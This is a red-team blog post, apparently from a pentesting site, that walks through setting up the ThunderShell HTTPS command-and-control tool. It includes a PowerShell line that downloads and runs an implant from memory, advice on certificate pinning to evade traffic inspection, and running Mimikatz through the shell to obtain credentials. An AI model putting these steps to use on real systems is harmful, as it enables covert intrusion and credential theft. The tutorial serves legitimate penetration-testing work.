Penetration Testing Lab

Articles from the Pentesting Field

Home Pentesting Distros Resources Submissions Toolkit Contact the Lab

Command and Control – Kernel Hijacking Digital Signatures Search the Lab
Search...

October 4, Command and Control – HTTPS Author

2017
netbiosX Red Team C2, Command and Control, Red Team, ThunderShell
Leave a comment

Command and control tools usually rely on a variety of protocols as a communication netbiosX
mechanism such as DNS, ICMP, HTTPS etc. Most endpoint products perform some deep
packet inspection in order to drop any arbitrary connections. Using a protocol that supports
encryption and pin the generated traffic with a certificate can evade the majority of the Follow PenTest Lab
products and it should be considered as a method during red team engagement.
Enter your email address to follow this blog and
ThunderShell was developed by MrUn1k0d3r and it is based in Python. It uses a Redis receive notifications of new posts by email.
server for HTTPS communication between the implant and the server and PowerShell for
execution of the implant on the target and any other scripts. The main advantage is that Join 1,667 other followers
supports certificate pinning for bypassing security products that perform traffic
Enter your email address
inspection. A similar tool that uses HTTPS as a communication protocol and PowerShell is
called PoshC2. Follow

ThunderShell has the following dependencies:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 1 apt install redis-server Recent Posts
2 apt install python-redis

The default.json file contains the tool configuration where traffic encryption can be enabled Command and Control – Browser
by setting an encryption key and pinned with a certificate to avoid detection. SPN Discovery
Situational Awareness
Lateral Movement – WinRM
AppLocker Bypass – CMSTP

Categories
Coding (10)
Defense Evasion (20)
Exploitation Techniques (19)
External Submissions (3)
General Lab Notes (21)
Information Gathering (12)
Infrastructure (2)
ThunderShell – Configuration Maintaining Access (4)
Mobile Pentesting (7)
When ThunderShell is executed it will start a web server which by default will listen on port Network Mapping (1)
8080. The web server will handle all the HTTP requests from the implants. Post Exploitation (12)
Privilege Escalation (14)
Red Team (27)
Social Engineering (11)
Tools (7)
VoIP (4)
Web Application (14)

ThunderShell – Console Wireless (2)

The implant (PS-RemoteShell) needs to be hosted on a webserver that is controlled by Archives

the red team. The implant requires the following parameters:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 IP – Webserver June 2018

Port – Webserver May 2018

April 2018
Encryption Key
January 2018
Delay
December 2017
November 2017
The following command will download and execute the implant directly from memory. October 2017
1 IEX (New-Object Net.WebClient).DownloadString('http://192.168 September 2017
August 2017
July 2017
June 2017
May 2017

ThunderShell – Implant Execution April 2017

March 2017
Once the implant is executed on the target it will communicate with the web server and a February 2017
new shell will obtained. January 2017
November 2016
September 2016
February 2015
January 2015
July 2014
April 2014
June 2013
May 2013
ThunderShell – Shell April 2013
March 2013
Every shell has its own unique ID. The list of the active shells with their associated ID’s
February 2013
can be obtained with the “list” command.
January 2013
December 2012
November 2012
October 2012

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 September 2012
August 2012
July 2012
June 2012
April 2012
March 2012
February 2012

@ Twitter
#BSidesLDN2018 was great so far! Many thanks to
@dradisfw for the ticket #dradis #greatproduct
6 hours ago
ThunderShell – List Active Shells Great talk by @john_shier about Dark Web!
#BSidesLDN2018 https://t.co/1yC8lVKn3X
Interaction with the shell is needed before the execution of any commands on the target. 7 hours ago
RT @myexploit2600: I be talking at 14:00 in track 2
@BSidesLondon #BsidesLDN2018 7 hours ago
Finally a social engineering talk #BSidesLDN2018
https://t.co/jMMk4lvbcH 8 hours ago
[New Post] Command and Control - Browser
pentestlab.blog/2018/06/06/com… #pentestlab
#Redteam 9 hours ago

Follow @netbiosX

Pen Test Lab Stats

ThunderShell – Interaction with the Shell
3,030,655 hits

ThunderShell has also the ability to read files, execute commands and scripts in memory,
file transfer etc. Blogroll

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Packetstorm Exploits,Advisories,Tools,Whitepapers
0
Metasploit Latest news about Metasploit Framework
and tutorials 0
0x191unauthorized Tutorials 0
The home of WeBaCoo Information about the
WeBaCoo and other tutorials 0
ThunderShell – Read Files
Command Line Kung Fu Command Line Tips and
Tricks 0
Commands can be executed on the target like any other normal shell.

Exploit Databases
Exploit Database Exploits,PoC,Shellcodes,Papers
0
Metasploit Database Exploit & Auxiliary Modules 0
Inj3ct0r Database Remote,Local,Web
Apps,Shellcode,PoC 0

Pentest Blogs
Carnal0wnage Ethical Hacking Tutorials 0
Coresec Pentest tutorials,Code,Tools 0
ThunderShell – Executing Commands Notsosecure From Pentesters To Pentesters 0
Pentestmonkey Cheatsheets,Tools and SQL
Since it is using PowerShell it is possible to execute various scripts that could enhance the Injection 0
capability of the tool like Mimikatz. Pentester Web Application Testing,Tips,Testing
Tools 0
Packetstorm Exploit Files 0
room362 Blatherings of a Security Addict 0
darkoperator Shell is only the Beginning 0
Irongeek Hacking Videos,Infosec Articles,Scripts 0

ThunderShell – Mimikatz Execution

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Professional
The results from Mimikatz can retrieved with the command refresh.
The Official Social Engineering Portal Information
about the Social Engineering Framework,Podcasts
and Resources 0

Next Conference

Security B-Sides London

April 29th, 2014
ThunderShell – Mimikatz
The big day is here.

References

https://github.com/Mr-Un1k0d3r/ThunderShell Facebook Page

Penetrati…
9.9K likes

Like Page

Be the first of your friends to

like this

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Advertisements Advertisements

Report this ad Report this ad

Report this ad

Rate this:

1 Vote

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Share this:

 Twitter  Facebook 96  LinkedIn  Pinterest

 Reddit  Tumblr  Google

Like
Be the first to like this.

Related

Command and Control - Command and Control - Lateral Movement -

Browser JavaScript WinRM
In "Red Team" In "Red Team" In "Red Team"

Leave a Reply

Enter your comment here...

Command and Control – Kernel Hijacking Digital Signatures

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Create a free website or blog at WordPress.com.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD